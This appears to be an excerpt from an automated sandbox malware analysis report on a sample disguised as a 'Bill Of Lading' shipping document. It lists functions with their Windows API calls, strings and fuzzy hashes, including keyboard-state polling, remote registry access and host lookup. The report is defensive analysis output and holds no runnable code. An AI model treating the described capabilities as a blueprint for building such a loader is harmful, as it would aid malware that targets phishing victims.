                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                                                      • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                                                      • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                      • API String ID: 3125838495-3381328864
                                                                                                                      • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                      • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                                                      • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                      • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                                      Function 00479921 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 314COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CopyVariant$ErrorLast
                                                                                                                      • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                      • API String ID: 2286883814-4206948668
                                                                                                                      • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                      • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                      • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                      • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                                      Function 00475D8B Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 194COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                        • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                      • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                                                      • _wcscpy.LIBCMT ref: 00475F18
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                      • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                                                      • API String ID: 3052893215-4176887700
                                                                                                                      • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                      • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                                                      • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                      • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                                                      Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                                      • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                                      • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                                      • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                                                      • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                                                        • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                                                      • String ID: Version$\TypeLib$interface\
                                                                                                                      • API String ID: 656856066-939221531
                                                                                                                      • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                      • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                      • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                      • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                      Function 0045E62E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                                      • __swprintf.LIBCMT ref: 0045E6EE
                                                                                                                      • _printf.LIBCMT ref: 0045E7A9
                                                                                                                      • _printf.LIBCMT ref: 0045E7D2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 3590180749-2354261254
                                                                                                                      • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                      • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                                      • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                      • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                                      Function 00452E2A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 154COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                      • API String ID: 3038501623-2263619337
                                                                                                                      • Opcode ID: 19a4eb4a0385f4e3e29933f3f54d071d1af3cac5b39b122aee5b24a105b2230c
                                                                                                                      • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                                                                      • Opcode Fuzzy Hash: 19a4eb4a0385f4e3e29933f3f54d071d1af3cac5b39b122aee5b24a105b2230c
                                                                                                                      • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                                                                      Function 004580E1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136registryshareCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • _memset.LIBCMT ref: 00458194
                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                      • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                      • API String ID: 2255324689-22481851
                                                                                                                      • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                      • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                      • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                      • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                                      Function 004584D6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                      • __wcsicoll.LIBCMT ref: 004585D6
                                                                                                                      • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                                                      • String ID: ($interface$interface\
                                                                                                                      • API String ID: 2231185022-3327702407
                                                                                                                      • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                      • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                      • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                      • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                                      Function 00436582 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                                                                      • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                                                                      • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                                                                      • _wcscpy.LIBCMT ref: 004365F5
                                                                                                                      • WSACleanup.WSOCK32 ref: 004365FD
                                                                                                                      • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                                                                      • _strcat.LIBCMT ref: 0043662F
                                                                                                                      • _wcscpy.LIBCMT ref: 00436644
                                                                                                                      • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                                                                      • _wcscpy.LIBCMT ref: 00436666
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                      • String ID: 0.0.0.0
                                                                                                                      • API String ID: 2691793716-3771769585
                                                                                                                      • Opcode ID: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
                                                                                                                      • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                                                      • Opcode Fuzzy Hash: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
                                                                                                                      • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                                                      Function 00416B12 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                                                      • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                                                        • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                                                        • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                                                      • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                                                      • __lock.LIBCMT ref: 00416B8A
                                                                                                                      • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                                                      • __lock.LIBCMT ref: 00416BAB
                                                                                                                      • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                      • API String ID: 1028249917-2843748187
                                                                                                                      • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                      • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                                                      • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                      • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                                                      Function 0044920C Relevance: 18.2, APIs: 12, Instructions: 243windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                                                      • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                                                      • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                                                      • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                                                      • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CharNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1350042424-0
                                                                                                                      • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                      • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                                      • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                      • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                                      Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                                      • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                                      • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                      • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                                                      • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                      • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                                                      Function 00437DB1 Relevance: 18.2, APIs: 12, Instructions: 180COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                                                                      • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00437F55
